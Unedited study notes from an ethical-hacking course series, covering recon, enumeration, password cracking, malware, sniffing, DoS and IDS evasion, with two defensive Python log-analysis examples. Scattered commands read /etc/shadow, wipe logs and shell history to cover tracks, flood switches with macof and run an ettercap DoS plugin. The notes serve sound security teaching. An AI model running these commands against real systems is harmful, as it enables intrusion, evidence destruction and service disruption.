Ethical Hacking: Notes



  • This document contains unedited notes and has not been formally proofread.
  • The information provided in this document is intended to provide a basic understanding of certain technologies.
  • Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.
  • Some websites and software may be flagged as malware by antivirus programs.
  • The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.
  • The document is not a substitute for professional advice or expert analysis and should not be used as such.
  • The document does not constitute an endorsement or recommendation of any particular technology, product, or service.
  • The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.
  • The author disclaims any liability for any damages or losses that may result from the use of this document or the information contained therein.
  • The author reserves the right to update or change the information contained in this document at any time without prior notice.

  • Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.
  • It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed upon scope is considered unauthorized and may result in legal action.
  • Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.
  • It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.
  • It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.
  • It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.

Reference:

Chapter 1: Ethical Hacking: Introduction to Ethical Hacking (LinkedIn), by Lisa Bock
Chapter 2: Ethical Hacking: Footprinting and Reconnaissance, by Lisa Bock
Chapter 3: Ethical Hacking: Scanning Networks, by Lisa Bock
Chapter 4: Ethical Hacking: Enumeration, by Malcolm Shore
Chapter 5: Ethical Hacking: Vulnerability Analysis, by Lisa Bock
Chapter 6: Ethical Hacking: System Hacking, by Lisa Bock
Chapter 7: Ethical Hacking: The Complete Malware Analysis Process, by Malcolm Shore
Chapter 8: Ethical Hacking: Sniffers, by Lisa Bock
Chapter 9: Ethical Hacking: Social Engineering, by Lisa Bock
Chapter 10: Ethical Hacking: Denial of Service, by Malcolm Shore
Chapter 11: Ethical Hacking: Session Hijacking, by Malcolm Shore
Chapter 12: Ethical Hacking: Evading IDS, Firewalls, and Honeypots, by Malcolm Shore
Chapter 13: Ethical Hacking: Hacking Web Servers and Web Applications, by Malcolm Shore
Chapter 14: Ethical Hacking: Wireless Networks, by Malcolm Shore
Chapter 15: Ethical Hacking: Mobile Devices and Platforms, by Malcolm Shore
Chapter 16: Ethical Hacking: Hacking IoT Devices, by Luciano Ferrari
Chapter 17: Ethical Hacking: Cryptography, by Stephanie Domas
Chapter 18: Ethical Hacking: Cloud Computing, by Daniel Lachance
Chapter 19: Ethical Hacking: SQL Injection, by Malcolm Shore


Technology: Security

Become an Ethical Hacker

Ethical hacking is the ability to identify vulnerabilities in an organization's network or infrastructure, and then address the issues to prevent incidents or attacks. Learn how to perform penetration testing and gain the knowledge and skills you need for a career in information security.

Chapter 1 : Introduction to Ethical Hacking: LinkedIn By: Lisa Bock

** Attack types

1. Passive

- Sniffing

- Port scanning

2. Active

- Release malware

- Launch DDoS

** Standards:

- COBIT framework

** Burst Attack or DoS

Reconnaissance - gather information about you.

Three basics for an organization to contain a cyber attack

1. Technical controls - Detect & Protect

2. Administrative

3. People


NAT - Network address translation

Spam filters, packet shapers & honeypots

TOGAF - The Open Group Architecture Framework

ITIL - Information Technology Infrastructure Library

COBIT - Control Objectives for Information and Related Technology

SOX - Sarbanes-Oxley Act

SOX sections 301 & 404 indirectly deal with information assurance and data integrity

Penetration testing: can include network devices, email, hosts, wireless, applications, and websites.

FISMA - Federal Information Security Management Act

Vulnerability Scanning Tool

1. Tenable

Ethical Hacking

Means -

- what is derived from the information

- what can be planned to devise countermeasures

Planned five-phase approach

- Reconnaissance

- Scanning

- Gaining access

- Maintaining access

- Covering Tracks


Chapter 2: Ethical Hacking: Footprinting and Reconnaissance By: Lisa Bock

Finding information everywhere:

Public resources - Websites, directories, email, job sites, Social websites.

Google Hacking database:

HTTrack Website Copier

Montastic is free for open source software


Monitor your Website and APIs from your computer. Get notified through Slack or E-mail when your server is down or response time is more than expected.

Shodan is the world's first search engine for Internet-connected devices.

Email Header look up

Metagoofil is an information gathering tool designed for extracting metadata of public documents

FOCA (Fingerprinting Organizations with Collected Archives)

theHarvester : Use it for open source intelligence (OSINT) gathering to help determine a company's external threat landscape on the internet.

DMARC, which stands for “Domain-based Message Authentication, Reporting & Conformance”, is an email authentication, policy, and reporting protocol.

The Anti Hacker Alliance™ fights against Hackers



Network Tools: The Trusted Free Online

dig Command in Linux

IP logger: can track geolocation using an IP logger URL


Chapter 3: Ethical Hacking: Scanning Networks By: Lisa Bock

Ports 1 - 1023

21 FTP

22 SSH

53 Domain Name System (DNS)

88 Kerberos

Ports from 1024-49151 are registered

3389 - Remote desktop Protocol (RDP)

Vulnerability Scan

Firewall response in port scanning:

Open means listening

Closed means denying

No reply means in stealth mode

Tools in Kali Linux:

Netcat and Nmap

Banner grabbing: is done to get

operating system

Open ports and service running

To Prevent Banner Grabbing:

Mask or disable the web server banner

Hide file extensions on services

Disable unnecessary services

SSDP: Simple Service Discovery Protocol

NetworkMiner is an open source Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network.

Fing app:

Net Scan by Nick Circelli

IP Tools: WiFi Analyzer by AmazingByte

Nikto:

Nikto is a free software command-line vulnerability scanner that scans webservers for dangerous files/CGIs, outdated server software and other problems.

Staying anonymous:

1. Use private browsing

2. Use Privacy Badger

3. Use a password manager

4. Use DuckDuckGo

5. Use a VPN

6. Use a temporary email address

Staying anonymous on mobile:

1. Don't use the phone

2. Don't use Google

3. Disable GPS

4. Use Waze

Onion routing (Tor):

1. Don't torrent

2. Don't install or enable plugins

3. Use only HTTPS

4. Don't open documents

Tor network flow

Proxy chain tools:

1. Proxy Switcher

2. Proxifier

3. Proxy Workbench

Kali Linux:

sudo apt-get install tor

sudo apt-get install proxychains

SSH tunnels:


Chapter 4 : Ethical Hacking: Enumeration By: Malcolm Shore

Enumeration is identifying:

1. Username

2. System addresses

3. Network resources


5. Other targets

Before vulnerability testing:

- Extract usernames

- Gather host information via null sessions

- port enumeration

- user account enumeration

- special protocol enumeration


- Local host enumeration

- remote host enumeration

- internet enumeration

- port and services enumeration

Useful services

Port 53 - DNS Domain Name System

Port 25 - SMTP Simple Mail Transfer Protocol

Port 135 - RPC Remote Procedure Call

Port 139 - NetBIOS

Port 161 - SNMP Simple Network Management Protocol

Port 389 - LDAP Lightweight Directory Access Protocol

Port 445 - SMB Server Message Block


└─$ echo $UID

└─$ cat /etc/passwd | more

└─$ sudo cat /etc/sudoers

└─$ getent group sudo

How to get a root shell from a user shell:

└─$ sudo su

└─# echo $UID

└─# exit




  • NetBIOS name service - port 137 UDP

  • Datagram distribution service - port 138 UDP

  • NetBIOS over TCP/IP - port 139 TCP

  • Samba is a Linux implementation of SMB

DCE Distributed Computing Environment

  • RPC Remote Procedure Call

Local-Host Enumeration: 

Profiling a Linux Metasploitable 2 

$ cat /proc/version 

$ cat /etc/*-release

$ cat /proc/cpuinfo

$ df -a

$ df -h

$ cat /etc/shells

List of user names

  • $ cat /etc/passwd

Password hashes

  • $ sudo cat /etc/shadow

$ pinky

$ w

$ who -a

Profiling a Windows host

Download PsTools:

Windows Terminal

Downloads> cd .\PSTools\

Downloads\PSTools> .\PsInfo.exe

Downloads\PSTools> .\PsInfo.exe -d

Downloads\PSTools> .\PsInfo.exe -s

Downloads\PSTools> .\pslist.exe

Downloads\PSTools> .\pslist.exe -t

Downloads\PSTools> .\pslist.exe -x

Downloads\PSTools> .\psloglist.exe -n 10

Downloads\PSTools> .\PsLoggedon.exe

Downloads\PSTools> .\PsService.exe

Downloads\PSTools> .\PsService.exe security Eventsystem

Downloads\PSTools> .\PsService.exe depend Eventsystem

Kali Linux:

Getting details from Metasploitable 2

smbmap -u '' -p '' -H -R

sudo netstat -i 

Get UDP open ports only

nmap -sU 

Get TCP open ports only 

nmap -PS

SMB from Linux:

└─$ nbtscan -h

└─$ sudo nbtscan -v -s :

└─$ sudo nbtscan -rv

└─$ ls /usr/share/nmap/scripts

└─$ sudo nmap --script smb-os-discovery

└─$ sudo nmap --script smb-enum-users

└─$ enum4linux -U

└─$ enum4linux -S

└─$ rpcclient -h


Understanding how to enumerate WMI is useful both for offensive and defensive activities.



└─$ whatweb

└─$ whatweb --no-errors | grep -v Unassigned

└─$ nikto -h

└─$ sudo apt install zaproxy


Tracing routes

└─$ sudo traceroute -I

Cloud enumeration

AWS has its own CLI (command line interface)

NetScanTools Basic Edition

└─$ telnet


Chapter 5 :Ethical Hacking: Vulnerability Analysis -By: Lisa Bock

Managing organizational risk:

Risk = Threats * Vulnerabilities

Zero-day attack

Vulnerability found in the wild -> unaware = public + vendor

Then, after that period, the vendor becomes aware -> unaware = public

Vendor releases patches -> aware = public

Assessing Vulnerabilities

  • Network scanning

  • 2 types 

    • Information systems = DBMS, software

    • Information technologies = Hardware, n/w devices

  • How to run a vulnerability scan

    • Unauthenticated scan = no username/password, basic configuration, can miss many vulnerabilities

    • Authenticated scan = cloned environment system, valid username/password, detailed scan

Lifecycle for Vuln management

  • Baseline

  • Assess vulnerabilities = plan (compliance requirements; tools: port scans, network scans, web app scans)

  • Assess Risk

  • Remediate = Mitigate the vuln. 

  • Verify = retest 

  • Monitor = continuous monitoring 

Threat Modeling 

Used to create a model of the entire system along with potential entry points and a list of possible attacks

Data Breach :

Web-based User Feedback System

Using STRIDE, listed here are some of the threats possible against this system, organized by class of threat. 

Analyzing Vulnerabilities 

NIST SP 800-30, Page 78

NIST: Common Vulnerability Scoring System Calculator [CVSS]

CVE: Common Vulnerabilities and Exposures

Each CVE has an ID, and its score is derived from CVSS metrics

Current CVSS Score Distribution For All Vulnerabilities

Learn Vulnerability scan from Web

Virtual Machine Image :

Kali linux

Commando VM:

Github link:-

Nikto: built into Kali Linux

└─$ nslookup

└─$ nikto -h

Fuzz Testing 

A black box method that floods a system with inputs

Kali linux - OWASP ZAP


Defending the LAN


Man In The Middle Attack

ARP spoofing 

MAC spoofing 

Cisco Discovery Protocol Attack

VLAN hopping attack

DHCP attack

Yersinia attack tool:

└─$ sudo yersinia -G

Attacks can be launched from Yersinia.

Monitoring Tools:

Firewalls and HIDS

Endpoint firewall examples- ZoneAlarm, ESET, and Norton Personal Firewall

Intrusion detection:

A host intrusion detection system must first learn the system; it can then monitor the host for suspicious activity

Examples - Symantec Endpoint Protection, McAfee Host Intrusion Prevention, Suricata.

Hack a website exercise:


Chapter 6: Ethical Hacking: System Hacking,  By: Lisa Bock

APT Advanced persistent Threat

NTLM New Technology LAN Manager


PAM Pluggable Authentication Modules

SASL Simple Authentication and Security Layer

Gaining access:

SAM Security Account Manager

Random password manager:

Dictionary Attack

Brute Force Attack

Hybrid Attack

Password cracking Tools:

L0phtCrack 7.2.0 has been released as an open source project

Ophcrack is a free Windows password cracker based on rainbow tables.

John the Ripper

Cain and Abel

Secure Hash Algorithms (SHA) are used for hashing passwords

RainbowCrack:

Create the hash format for the password

Online Reverse Hash Lookup

Escalating Privileges

  • Horizontal

  • Vertical  

Privilege escalation takes advantage of a vulnerability and tries to gain administrator access.


Password Resetting Tool:

simda bot free ip scanner

Recognizing Spyware

Categories of Malware

  • Spyware

  • Viruses

  • Worms

  • Trojans

  • Rootkits

  • Adware

Always block third-party cookies

Anti Spyware Tools: 

Spybot Identity Monitor is a simple program to monitor email addresses and usernames against the Have I Been Pwned database of leaked account information.


Help Your Kids by Watching Their Back


 non-profit foundation, creating free open-source macOS security tools, books, and the #OBTS conference


Hiding in plain sight

Creating hidden content (NTFS alternate data stream):

desktop> notepad temp.txt:secret.txt

To display the hidden content:

desktop> more < temp.txt:secret.txt

Steganography Tools: these are obsolete 

  • MP3Stego

  • S-Tools

  • OpenPuff

Update: Local Security Policy in Windows

Local Policies -> Audit Policy -> Audit account logon events -> enable

Covering tracks:

  • For Linux: Metasploit meterpreter > clearev

  • Open log files stored in the /var/log directory

    • In BackTrack: kwrite /var/log/messages

  • Erase command history

    • export HISTSIZE=0

  • Open Event Logger and select clear log


Chapter 7: Ethical Hacking: The Complete Malware Analysis Process By: Malcolm Shore

Introduction to Malware

Improve the Windows startup services: in Regedit, delete unwanted registry keys under:

  • Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

  • Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

  • Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run

  • Computer\HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager

  • Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

  • Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs


Zeus malware:

Zeus, also known as Zbot, is a kind of malware, referred to as a trojan, which can secretly install itself on your device.

  • Citadel (malware)

Virus Construction Kit

2 types 

  • GUI interface

  • Configuration file

SpyEye Builder 


Trojan Development Kit - TDK

Reference: Transcriptase–Light: A Polymorphic Virus Construction Kit


MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.

Malware Detection

IOC Indicator of Compromise

IOA Indicator of Attack

IOC Bucket is a free, community-driven platform dedicated to providing the security community a way to share quality threat intelligence in a simple but efficient way.


ADS Anomaly Detection System 

Sandboxing Malware

Some enterprise products as examples

Malware That changes

  • Polymorphic

  • Metamorphic

  • Delivery via Phishing, via port 445 - configured for file sharing

APT Defenses: advanced persistent threat 

Targeted cyberattacks logbook

Click on each malware entry to get more information

SODIN malware:

Exploits using CVE-2019-2725/9

Dropper installs w32.sodin malware

Privilege escalation using CVE-2018-8453 & gains full system privileges

BlackEnergy 2 & 3: malware that attacks industrial control workstations

Encrypted rootkit payload

GreyEnergy malware

Reverse Engineering Malware is a repository of malware samples to provide security researchers, incident responders, forensic analysts, and the morbidly curious access to samples of live malicious code


A source for packet capture (pcap) files and malware samples

Automated Malware analysis
Hybrid Analysis 

This is a free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology. 

BlackEnergy /2 /3 - malware that attacks industrial control workstations

Encrypted rootkit payload

Help file in Russian

It uses HTTP basic authentication as a password protection scheme to protect the botnet. Its configuration file enables a high level of customization of the denial-of-service attack, allowing the form of denial-of-service and the packet size and frequency to be configured. Its attacks include ICMP ping flooding, TCP SYN attacks, UDP flooding, HTTP GET request flooding, DNS flooding, and basic binary data flooding.

BlackEnergy 2

  • Kernel mode driver

  • Process injection

  • Privilege escalation based on MS08-025

BlackEnergy 3

  • 2015 Ukraine power grid attacks

  • Then evolved into GreyEnergy malware

Analyzing Packers

UPX is a free, portable, extendable, high-performance executable packer for several executable formats.

Ghidra: a software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission


Chapter 8: Ethical Hacking: Sniffers, By: Lisa Bock

Sniffing  or Packet Analysis


  • Wireshark


  • Comes with Nmap for Windows along with Wireshark.


  • Gather

  • Decode

  • Display

  • Analyze

    • Is the traffic normal

      • TCP flags

      • Malware Signatures

      • Traffic in clear text

      • Router advertisements 

OSI Model


OSI model in wireshark 

Active Attacks:

  • Denial of Service DoS

  • Buffer overflow

  • Password attack

Tapping into the data stream

  • 2 basic types of ethernet environments

    • Shared or hub based

    • Switched network


  • 802.11b/g/n act like a hub

IPv4 Vs IPv6

MAC Attacks 



└─$ sudo macof

Vulnerable protocols

  • STP = Spanning Tree Protocol 

    • Attacks

      • DoS using BPDU Flood

  • CDP = Cisco Discovery Protocol

    • Attacks

      • Send bogus CDP to other devices

      • Flood CDP & cause a DoS

  • DTP

  • DHCP

  • HSRP

  • ISL

  • VTP

  • 802.1Q

  • 802.1X

Macof attack defense

  • Use switch port security

MAC spoofing defense

  • Used in man-in-the-middle attacks

  • Filter on trusted IP & MAC addresses


DHCP process

  • Discover

  • Offer

  • Request

  • Acknowledge

VLAN Access Control List VACL

  • Access control on the switch not the router



Ettercap

  • Tool in Kali Linux

  • Used in man-in-the-middle attacks

└─$ ettercap -G

Old websites


To prevent DNS attacks

  • Enable Cache locking

Sniffing tools and techniques


Linux Tools

  • Tcpdump

  • Ettercap

  • Dsniff

Windows - WhoFi


Chapter 9: Ethical Hacking: Social Engineering  By: Lisa Bock

Social Engineering Techniques 

  • Phone phishing

  • Online recon

  • Dumpster diving

  • Shoulder surfing

  • Simple persuasion


  • Poses as love interest

  • Lures you into a relationship 


  • Privacy most important 

  • TOR browser

Extensions or Addons 

  • Auto update enabled 

Reputation Risk

  • Use of social platform 

Information Collection 

  • Identity theft

  • Report fake accounts on Facebook

Penetration testing with social Engineering

  • Phishing emails

  • Dangerous websites 

  • Fake Call 

Pentesting with SET - Social Engineering Toolkit

  • Download the toolkit or use with kali linux

  • SET - Crafts the bait

  • Metasploit - creates the exploit

The Social-Engineer Toolkit (SET)

The Social-Engineer Toolkit (SET) - TrustedSec


Desktop file shredder: File Shredder


Chapter 10 : Ethical Hacking: Denial of Service, By Malcolm Shore

Understanding DoS


  • Digital Attack Map

Attack Types:

  • DoS

  • DDoS

Network Based attacks

  • TCP SYN flood 

  • Smurf (ICMP) flood

  • UDP flood

  • ARP flood

  • DNS reflection 

Wireless Attacks

  • De-authentication

  • Routing congestion

Application Attacks

  • HTTP services

  • FTP service

  • SIP services

Infrastructure of DoS

└─$ hping3 -h

HPing3 Cheatsheet ≈ Packet Storm

Hyenae download

Hyenae is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant.

LOIC Approach



└─$ ettercap -P list

└─$ ettercap -TQP dos_attack

└─$ ettercap -G


└─$ service --status-all | more


Denial of service using NTP servers to amplify attacks

It appears someone is using an attack vector like this to DDOS CloudFlare

GitHub - vpnguy-zz/ntpdos: Create a DDOS attack using NTP servers


Memcached: free & open source, high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.


This tool allows you to send forged UDP packets to Memcached servers obtained from

GitHub - 649/Memcrashed-DDoS-Exploit: DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API

Wireless DoS



└─$ sudo airmon-ng

Application DoS


GoldenEye is an HTTP DoS test tool. This tool can be used to test if a site is susceptible to Denial of Service (DoS) attacks. It is possible to open several parallel connections against a URL to check if the web server can be compromised.



Cryptolocker Ransomware

  • Distributed by botnets

  • Drops randomly generated name

  • Inserts startup command into registry

Post Encryption 

  • Ransom Message displayed

  • Countdown timer started

  • If payment not received, files are deleted 

Paying Ransom

  • Payment of the ransom is made using bitcoins. 

  • Other variants use alternative anonymous payment methods, such as U.CASH, CASHU, or prepaid cash money cards. 

  • Once the victim pays the ransom, a transaction ID is provided. 

  • The victim can then enter this into the Cryptolocker program that is running.

  • The private key is then sent to the victim, and the decryption process begins.

Mitigation Techniques

Mitigation by design

  • Priority based servicing 

    • Priority Management

    • Discard low priority

    • Aggregate based congestion control [ACC]

  • Egress filtering

    • Packet inspection

    • Detect bad packets

  • Ingress filtering 

    • Malicious packet detection

    • Network context

Operational mitigation

  • IP address verification

    • Source address spoofing

    • Real Time detection

    •  Real time traceback 

  • Rate limiting

  • ACLs

  • Detecting known malicious threats

    • Characterizing normal

    • Metrics to reflect normal boundaries 

  • Detecting traffic anomalies
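The NTP and Memcached reflection tools listed earlier in this chapter and the "detecting traffic anomalies" item above describe the same thing from two sides: a reflector service answering a small request with a much larger response aimed at a spoofed source. As an added example (not from the course or these notes), the Python below measures the response-to-request byte ratio per reflector service over constructed flow records and flags anomalous amplification; the flow-record layout, sample addresses and the threshold are assumptions.

```python
"""Flag UDP amplification traffic in flow records (added example, not course code).

For each reflector service (NTP on UDP/123, Memcached on UDP/11211), compare the
bytes a reflector sent toward an address with the bytes that address sent to it.
A high ratio, or responses with no request at all, is the signature of a
reflection attack against that address. Flow-record format and all sample flows
below are constructed for this example; thresholds are assumptions.
"""
from collections import defaultdict

# Constructed record layout (not any real exporter's format):
# timestamp,proto,src_ip,src_port,dst_ip,dst_port,packets,bytes
SAMPLE_FLOWS = """\
1700000000,UDP,203.0.113.7,50000,198.51.100.10,123,100,4800
1700000000,UDP,198.51.100.10,123,203.0.113.7,50000,100,44000
1700000001,UDP,203.0.113.7,50001,198.51.100.11,11211,10,150
1700000001,UDP,198.51.100.11,11211,203.0.113.7,50001,10,1400000
1700000002,UDP,192.0.2.5,40000,198.51.100.10,123,5,240
1700000002,UDP,198.51.100.10,123,192.0.2.5,40000,5,240
1700000003,TCP,192.0.2.9,50002,198.51.100.20,80,12,3000
1700000004,UDP,198.51.100.12,123,192.0.2.77,60000,50,22000
"""

# UDP services commonly abused as reflectors (port -> name) and the
# response/request byte ratio above which a flow pair is treated as anomalous.
REFLECTOR_PORTS = {123: "ntp", 11211: "memcached"}
AMPLIFICATION_THRESHOLD = 5.0


def parse_flows(text):
    """Parse constructed flow records into dicts, skipping blank or malformed lines."""
    flows = []
    for line in text.splitlines():
        parts = line.strip().split(",")
        if len(parts) != 8:
            continue
        ts, proto, sip, sport, dip, dport, pkts, nbytes = parts
        flows.append({
            "ts": int(ts), "proto": proto,
            "src_ip": sip, "src_port": int(sport),
            "dst_ip": dip, "dst_port": int(dport),
            "packets": int(pkts), "bytes": int(nbytes),
        })
    return flows


def amplification_report(flows):
    """Return {(client_ip, service): {"request_bytes", "response_bytes", "factor"}}.

    client_ip is the address that receives the reflector's responses. In a real
    attack that address is the victim: the requests carried its spoofed source
    address, so the request side is small or entirely absent in the victim's
    own traffic, which is why ingress (source address) filtering is a mitigation.
    """
    request = defaultdict(int)
    response = defaultdict(int)
    for f in flows:
        if f["proto"] != "UDP":
            continue
        if f["dst_port"] in REFLECTOR_PORTS:        # client -> reflector
            request[(f["src_ip"], REFLECTOR_PORTS[f["dst_port"]])] += f["bytes"]
        elif f["src_port"] in REFLECTOR_PORTS:      # reflector -> client
            response[(f["dst_ip"], REFLECTOR_PORTS[f["src_port"]])] += f["bytes"]
    report = {}
    for key in set(request) | set(response):
        req_b, resp_b = request.get(key, 0), response.get(key, 0)
        # Responses with no matching request are treated as infinitely amplified:
        # somebody else sent the request with this address as the source.
        factor = resp_b / req_b if req_b else float("inf")
        report[key] = {"request_bytes": req_b, "response_bytes": resp_b, "factor": factor}
    return report


def suspicious_targets(flows, threshold=AMPLIFICATION_THRESHOLD):
    """Return [(client_ip, service, factor), ...] at or above threshold, largest first."""
    hits = [(ip, svc, r["factor"])
            for (ip, svc), r in amplification_report(flows).items()
            if r["factor"] >= threshold]
    return sorted(hits, key=lambda h: (-h[2], h[0], h[1]))


if __name__ == "__main__":
    for ip, svc, factor in suspicious_targets(parse_flows(SAMPLE_FLOWS)):
        print(f"{ip:15} {svc:10} amplification x{factor:.1f}")
```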


Repose is an open-source, RESTful, middleware platform that transparently integrates with your existing infrastructure. Repose provides highly scalable and extensible solutions to API processing tasks such as authentication, rate limiting, API validation, HTTP request logging, and much more.

Project Shield

Project Shield, created by Google Cloud and Jigsaw and powered by Google Cloud Armor, provides free unlimited protection against DDoS attacks, a type of digital attack used to censor information by taking websites offline



Resilient Interdomain Traffic Exchange: BGP Security and DDoS Mitigation

  • 39 control plane and BGP security recommendations

  • 26 DDoS mitigation recommendations

    • 12 recommendations for source address validations

    • 7 recommendations for port Filtering 

    • 1 recommendation on rate limiting

    • 6 recommendations on flow specification blackholing

IOT Distributed IDS


Chapter 11: Ethical Hacking: Session Hijacking By: Malcolm Shore

Introduction to session hijacking

  • Stateless HTTP

  • Session IDs

  • PHP session array


Establishing Man in the Middle

  • Web proxy

  • ARP poisoning

  • Malicious Wifi

Cookie hijacking 


Subterfuge-Framework /Framework for Man-In-The-Middle attacks

ARP poisoning

Cain and Abel



Hijack Putty sessions in order to sniff conversation and inject Linux commands.

DNS Hijacking

Cloud hijacking 

API key hijack

Hijacking the physical world

Vehicle wiring Diagram

Parrot Drone

  • UDP 5554- telemetry data

  • TCP 5555- streaming video

  • UDP 5556- flight commands

  • UDP 5559- critical data

Acrylic Wi-Fi Home – WiFi Scanner

Enhanced Kamkar attack

  • Telnet connection

  • Add firewall rule

  • Laptop application to control drone

Photography Drone

  • 2.4GHz radio control link

  • XBee telemetry link

  • 5.8GHz streaming video link

Telemetry Channel attacks 

  • Detect all ZigBee stations

  • Delete the MAC address and set the attacker's MAC address

  • Pair victim with attacker


Chapter 12: Ethical Hacking: Evading IDS, Firewalls, and Honeypots. By: Malcolm Shore


Windows Firewall

  • Windows Defender Firewall Properties 

    • Public Profile

      • Inbound connections = Block all connections

      • Settings -> Customize -> Allow unicast response = No (to be safe, mark it as No)

      • Logging->Customize->

        • Log Dropped packets = Yes

        • Log Successful connections = yes
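With "Log dropped packets" enabled as above, the firewall writes its log (pfirewall.log) as W3C-style text whose "#Fields:" header names the columns. As an added example (not from the course or these notes), the Python below parses that layout from constructed lines and summarises dropped inbound attempts per source address, flagging sources that probed many distinct ports; the sample lines and the scan threshold are assumptions.

```python
"""Summarise dropped inbound connections from a Windows Defender Firewall log.

Added example, not from the course notes. Parses the W3C-style pfirewall.log
layout (column names come from the "#Fields:" directive), counts DROP events on
the RECEIVE path per source address, and lists sources that touched many
distinct destination ports, which is how a port scan against the host shows up
in this log. All log lines below are constructed; the threshold is an assumption.
"""
from collections import defaultdict

SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path

2023-11-14 10:00:01 DROP TCP 203.0.113.7 192.168.1.10 51234 22 52 S 3281992 0 8192 - - - RECEIVE
2023-11-14 10:00:01 DROP TCP 203.0.113.7 192.168.1.10 51235 80 52 S 3281993 0 8192 - - - RECEIVE
2023-11-14 10:00:02 DROP TCP 203.0.113.7 192.168.1.10 51236 135 52 S 3281994 0 8192 - - - RECEIVE
2023-11-14 10:00:02 DROP TCP 203.0.113.7 192.168.1.10 51237 139 52 S 3281995 0 8192 - - - RECEIVE
2023-11-14 10:00:02 DROP TCP 203.0.113.7 192.168.1.10 51238 445 52 S 3281996 0 8192 - - - RECEIVE
2023-11-14 10:00:03 DROP TCP 203.0.113.7 192.168.1.10 51239 3389 52 S 3281997 0 8192 - - - RECEIVE
2023-11-14 10:00:05 DROP TCP 198.51.100.5 192.168.1.10 40001 445 52 S 11111 0 8192 - - - RECEIVE
2023-11-14 10:00:09 DROP TCP 198.51.100.5 192.168.1.10 40002 445 52 S 11112 0 8192 - - - RECEIVE
2023-11-14 10:00:10 DROP UDP 192.168.1.33 192.168.1.255 137 137 78 - - - - - - - RECEIVE
2023-11-14 10:00:11 ALLOW TCP 192.168.1.20 192.168.1.10 50000 3389 0 - 0 0 0 - - - RECEIVE
2023-11-14 10:00:12 DROP TCP 192.168.1.10 203.0.113.9 50123 443 52 S 5555 0 8192 - - - SEND
"""


def parse_pfirewall_log(text):
    """Parse the log into a list of dicts keyed by the names in the #Fields header."""
    fields = None
    events = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]      # column names follow the directive
            continue                           # other directives are metadata
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue                           # no header yet, or a truncated line
        events.append(dict(zip(fields, parts)))
    return events


def dropped_inbound_by_source(events):
    """Return {src_ip: {"count": n, "ports": [distinct dst ports, sorted]}} for DROP on RECEIVE."""
    summary = defaultdict(lambda: {"count": 0, "ports": set()})
    for e in events:
        if e["action"] != "DROP" or e["path"] != "RECEIVE":
            continue                           # allowed traffic and blocked outbound are out of scope
        entry = summary[e["src-ip"]]
        entry["count"] += 1
        if e["dst-port"] != "-":               # ICMP entries carry no port
            entry["ports"].add(int(e["dst-port"]))
    return {ip: {"count": v["count"], "ports": sorted(v["ports"])} for ip, v in summary.items()}


def probable_scanners(events, min_ports=5):
    """Sources whose dropped inbound attempts touched at least min_ports distinct ports."""
    return sorted(ip for ip, s in dropped_inbound_by_source(events).items()
                  if len(s["ports"]) >= min_ports)


if __name__ == "__main__":
    evts = parse_pfirewall_log(SAMPLE_LOG)
    for ip, s in sorted(dropped_inbound_by_source(evts).items()):
        print(f"{ip:15} drops={s['count']:3} ports={s['ports']}")
    print("probable scanners:", probable_scanners(evts))
```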

Windows DNS Log Analyser

Linux Firewall



└─$ sudo iptables -L -n -v


└─$ cat /var/log/kern.log

Networking using GNS3

GNS3:

All in one:

  • Tour of GNS3

  • Basic operation

  • Routed network

  • ASA secure enclave


Honeypots

  • Target to lure attackers

    • Identify and prosecute

    • Monitor and analyze

  • Types of honey pots

    • Low interaction 

    • High interaction

    • Honeynets

  • sinkhole

This page contains a list of tools and services that we use on a regular basis. Most of these tools have been created by our members and participating GSoc students, but some are also external and not affiliated with the Honeynet Project. We hope you find the below link collection useful.

Protection from Intrusion

  • Blacklist the websites

  • Whitelist

    • Just add the sites to be allowed

    • This is easier than maintaining the blacklist 


Snort

  • Log and alert output

    • alert_fast

    • alert_full

    • Default directory /var/log/snort/

    • alert_syslog


Suricata is the leading independent open source threat detection engine. By combining intrusion detection (IDS), intrusion prevention (IPS), network security monitoring (NSM) and PCAP processing, Suricata can quickly identify, stop, and assess even the most sophisticated attacks.

Security Onion

